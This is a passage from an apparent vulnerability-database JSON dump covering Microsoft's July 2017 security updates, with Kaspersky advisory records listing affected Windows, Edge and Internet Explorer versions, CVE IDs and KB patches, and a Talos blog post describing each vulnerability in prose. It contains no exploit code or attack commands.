arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0170>) \n[CVE-2017-8463](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8463>) \n[CVE-2017-8467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8467>) \n[CVE-2017-8486](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8486>) \n[CVE-2017-8495](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8495>) \n[CVE-2017-8556](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8556>) \n[CVE-2017-8557](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8557>) \n[CVE-2017-8561](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8561>) \n[CVE-2017-8562](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8562>) \n[CVE-2017-8563](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8563>) \n[CVE-2017-8564](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8564>) \n[CVE-2017-8565](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8565>) \n[CVE-2017-8566](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8566>) \n[CVE-2017-8573](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8573>) \n[CVE-2017-8574](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8574>) \n[CVE-2017-8577](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8577>) \n[CVE-2017-8578](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8578>) \n[CVE-2017-8580](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8580>) \n[CVE-2017-8581](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8581>) \n[CVE-2017-8582](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8582>) \n[CVE-2017-8584](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8584>) \n[CVE-2017-8587](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8587>) \n[CVE-2017-8588](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8588>) \n[CVE-2017-8589](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8589>) \n[CVE-2017-8590](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8590>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8592>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-0170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0170>)0.0Unknown \n[CVE-2017-8463](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8463>)0.0Unknown \n[CVE-2017-8467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8467>)0.0Unknown \n[CVE-2017-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8486>)0.0Unknown \n[CVE-2017-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8495>)0.0Unknown \n[CVE-2017-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8556>)0.0Unknown \n[CVE-2017-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8557>)0.0Unknown \n[CVE-2017-8561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8561>)0.0Unknown \n[CVE-2017-8562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8562>)0.0Unknown \n[CVE-2017-8563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8563>)0.0Unknown \n[CVE-2017-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8564>)0.0Unknown \n[CVE-2017-8565](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8565>)0.0Unknown \n[CVE-2017-8566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8566>)0.0Unknown \n[CVE-2017-8573](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8573>)0.0Unknown \n[CVE-2017-8574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8574>)0.0Unknown \n[CVE-2017-8577](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8577>)0.0Unknown \n[CVE-2017-8578](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8578>)0.0Unknown \n[CVE-2017-8580](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8580>)0.0Unknown \n[CVE-2017-8581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8581>)0.0Unknown \n[CVE-2017-8582](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8582>)0.0Unknown \n[CVE-2017-8584](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8584>)0.0Unknown \n[CVE-2017-8587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8587>)0.0Unknown \n[CVE-2017-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8588>)0.0Unknown \n[CVE-2017-8589](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8589>)0.0Unknown \n[CVE-2017-8590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8590>)0.0Unknown \n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4025344](<http://support.microsoft.com/kb/4025344>) \n[4025338](<http://support.microsoft.com/kb/4025338>) \n[4025331](<http://support.microsoft.com/kb/4025331>) \n[4025333](<http://support.microsoft.com/kb/4025333>) \n[4025336](<http://support.microsoft.com/kb/4025336>) \n[4025343](<http://support.microsoft.com/kb/4025343>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 46, "modified": "2020-07-22T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11067", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11067", "title": "\r KLA11067Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8599", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8594", "CVE-2017-8601", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8609", "CVE-2017-8592", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8602", "CVE-2017-8618"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to bypass security restrictions, execute arbitrary code and spoof user interface.\n\n### *Affected products*:\nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11 \nMicrosoft Edge \nMicrosoft Windows 10 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) \n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) \n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) \n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)4.3Warning \n[CVE-2017-8594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8594>)7.6Critical \n[CVE-2017-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8595>)7.6Critical \n[CVE-2017-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8596>)7.6Critical \n[CVE-2017-8598](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8598>)7.6Critical \n[CVE-2017-8599](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8599>)4.3Warning \n[CVE-2017-8601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8601>)7.6Critical \n[CVE-2017-8602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8602>)4.3Warning \n[CVE-2017-8603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8603>)7.6Critical \n[CVE-2017-8604](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8604>)7.6Critical \n[CVE-2017-8605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8605>)7.6Critical \n[CVE-2017-8606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8606>)7.6Critical \n[CVE-2017-8607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8607>)7.6Critical \n[CVE-2017-8608](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8608>)7.6Critical \n[CVE-2017-8609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8609>)7.6Critical \n[CVE-2017-8610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8610>)7.6Critical \n[CVE-2017-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8611>)4.3Warning \n[CVE-2017-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8617>)7.6Critical \n[CVE-2017-8618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618>)7.6Critical \n[CVE-2017-8619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8619>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4025344](<http://support.microsoft.com/kb/4025344>) \n[4025338](<http://support.microsoft.com/kb/4025338>) \n[4025331](<http://support.microsoft.com/kb/4025331>) \n[4025336](<http://support.microsoft.com/kb/4025336>) \n[4025341](<http://support.microsoft.com/kb/4025341>) \n[4025252](<http://support.microsoft.com/kb/4025252>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 46, "modified": "2020-06-18T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11070", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11070", "title": "\r KLA11070Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0170", "CVE-2017-0243", "CVE-2017-8463", "CVE-2017-8467", "CVE-2017-8486", "CVE-2017-8495", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8556", "CVE-2017-8557", "CVE-2017-8559", "CVE-2017-8560", "CVE-2017-8561", "CVE-2017-8562", "CVE-2017-8563", "CVE-2017-8564", "CVE-2017-8565", "CVE-2017-8566", "CVE-2017-8569", "CVE-2017-8570", "CVE-2017-8573", "CVE-2017-8574", "CVE-2017-8577", "CVE-2017-8578", "CVE-2017-8580", "CVE-2017-8581", "CVE-2017-8582", "CVE-2017-8584", "CVE-2017-8585", "CVE-2017-8587", "CVE-2017-8588", "CVE-2017-8589", "CVE-2017-8590", "CVE-2017-8592", "CVE-2017-8594", "CVE-2017-8595", "CVE-2017-8596", "CVE-2017-8598", "CVE-2017-8599", "CVE-2017-8601", "CVE-2017-8602", "CVE-2017-8603", "CVE-2017-8604", "CVE-2017-8605", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8608", "CVE-2017-8609", "CVE-2017-8610", "CVE-2017-8611", "CVE-2017-8617", "CVE-2017-8618", "CVE-2017-8619", "CVE-2017-8621"], "description": "Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.<br /><br /><a name='more'></a><br /><h3>Vulnerabilities Rated Critical</h3><br /><h4></h4><h4>CVE-2017-8463</h4><div>This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited this vulnerability could run arbitrary code, users not running as administrators would be less affected. This vulnerability can be triggered via a malicious share folder and malware named with an executable extension.<br /><br /></div><h4>CVE-2017-8584</h4>A remote code execution vulnerability exists when HoloLens improperly handles objects in memory. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would need to send a specially crafted WiFi packet.<br /><br /><h4>CVE-2017-8589</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><br /><h4>CVE-2017-8594</h4>A remote code execution vulnerability exists when Internet Explorer, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. <br /><br /><h4>CVE-2017-8595 / CVE-2017-8596 / CVE-2017-8617 </h4>A remote code execution vulnerability exists in Microsoft Edge, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. In addition, an attacker could embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the browser rendering engine. <br /><br /><h4>CVE-2017-8598</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8601</h4>This is a remote code execution vulnerability in the Chakra JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website or an ActiveX control marked \"safe for initialization\" resulting in the attacker gaining taking full control of the affected system. <br /><br /><h4>CVE-2017-8603</h4>This is a remote code execution vulnerability in Microsoft Edge related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage. <br /><br /><h4>CVE-2017-8604</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8605</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document. <br /><br /><h4>CVE-2017-8606 / CVE-2017-8607 / CVE-2017-8608 / CVE-2017-8609</h4>This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. <br /><br /><h4>CVE-2017-8610</h4>This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office.<br /><br /><h4>CVE-2017-8618</h4>This is a remote code execution in the VBScript engine, when rendered in Internet Explorer handles objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. <br /><br /><h4>CVE-2017-8619</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website. <br /><br /><br /><h4></h4><h3>Vulnerabilities Rated Moderate</h3><div><br /></div><div><br /></div><h4>CVE-2017-0170</h4>An information disclosure vulnerability exists in the Windows Performance Monitor Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data and convince an authenticated user to create a Data Collector Set and import the file. To create a Data Collector Set, the user must be a member of the Performance Log Users or Local Administrators group.<br /><br /><h4>CVE-2017-8611</h4>This is a spoofing vulnerability in Microsoft Edge when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities. <br /><br /><h4>CVE-2017-8621</h4>An open redirect vulnerability exists in Microsoft Exchange that could lead to spoofing. To exploit the vulnerability, an attacker could send a crafted URL, when an authenticated Exchange user clicks the link, the authenticated user's browser session could be redirected to a malicious site that is designed to impersonate a legitimate website. By doing so, the attacker could trick the user and potentially acquire sensitive information, such as the user's credentials.<br /><br /><br /><h3>Vulnerabilities Rated Important</h3><div><br /></div><div><br /></div><h4>CVE-2017-0243</h4>A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file. <br /><br /><h4>CVE-2017-8467</h4>An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8486</h4>This is an information disclosure vulnerability in Microsoft Windows when Win32k fails to properly handle objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application. <br /><br /><h4>CVE-2017-8495</h4>A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. Successful exploitation of this vulnerability could be used to bypass Extended Protection for Authentication. <br /><br /><h4>CVE-2017-8501 / CVE-2017-8502</h4>These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website. <br /><br /><h4>CVE-2017-8556</h4>An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8557</h4>An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data. <br /><br /><h4>CVE-2017-8559 / CVE-2017-8560</h4>An elevation of privilege vulnerability exists when Microsoft Exchange Outlook Web Access (OWA) fails to properly handle web requests. Exploitation occurs by an authenticated attacker sending a specially crafted request. <br /><br /><h4>CVE-2017-8561</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8562</h4>There is a privilege escalation vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC). This is exploitable by local attacker executing a specially crafted application to elevate privilege.<br /><br /><h4>CVE-2017-8563</h4>An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. This is exploitable by local attacker executing a specially crafted application to send malicious traffic to a domain controller. <br /><br /><h4>CVE-2017-8564</h4>This is an information disclosure vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a crafted application, allowing the attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. <br /><br /><h4>CVE-2017-8565</h4>This is a remote code execution vulnerability within PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system. <br /><br /><h4>CVE-2017-8566</h4>This is an elevation of privilege vulnerability in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled and an attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. This is exploitable by local attacker executing a specially crafted application to elevate privilege. <br /><br /><h4>CVE-2017-8569</h4>An elevation of privilege vulnerability exists in Microsoft SharePoint Server, when it does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability, via a specially crafted request, to an affected SharePoint server. If successfully the attacker could then perform cross-site scripting attacks on affected systems and run scripts in the privilege of the current user. This can allow the attacker to read content they are not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user.<br /><br /><h4>CVE-2017-8570</h4>A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file.<br /><br /><h4>CVE-2017-8573 / CVE-2017-8574 / CVE-2017-8577 / CVE-2017-8578 / CVE-2017-8580</h4>An elevation of privilege vulnerability exists in Microsoft Graphics Component. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.<br /><br /><h4>CVE-2017-8581</h4>An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An authenticated attacker who successfully exploited this vulnerability could run processes in an elevated context.<br /><br /><h4>CVE-2017-8582</h4>An Information Disclosure vulnerability exists when the HTTP.sys server application component improperly handles objects in memory. A remote unauthenticated attacker could exploit this vulnerability by issuing a request to the server application.<br /><br /><h4>CVE-2017-8585</h4>This is a denial of service vulnerability when Microsoft Common Object Runtime Library improperly handles web requests. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET application. This attack could cause a denial of service on the target system, requiring a reboot to resolve. <br /><br /><h4>CVE-2017-8587</h4>A Denial Of Service vulnerability exists when Windows Explorer attempts to open a non-existent file. An attacker could exploit this vulnerability by hosting a specially crafted web site and convince a user to browse to the page, containing the reference to the non-existing file, and cause the victim's system to stop responding.<br /><br /><h4>CVE-2017-8588</h4>A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. An attacker could exploit the vulnerability by sending a specially crafted file to the user via email.<br /><br /><h4>CVE-2017-8590</h4>An elevation of privilege vulnerability exists in Windows Common Log File System (CLFS). A locally authenticated attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.<br /><br /><h4>CVE-2017-8592</h4>A security feature bypass vulnerability exists when Microsoft Browsers improperly handle redirect requests. This vulnerability 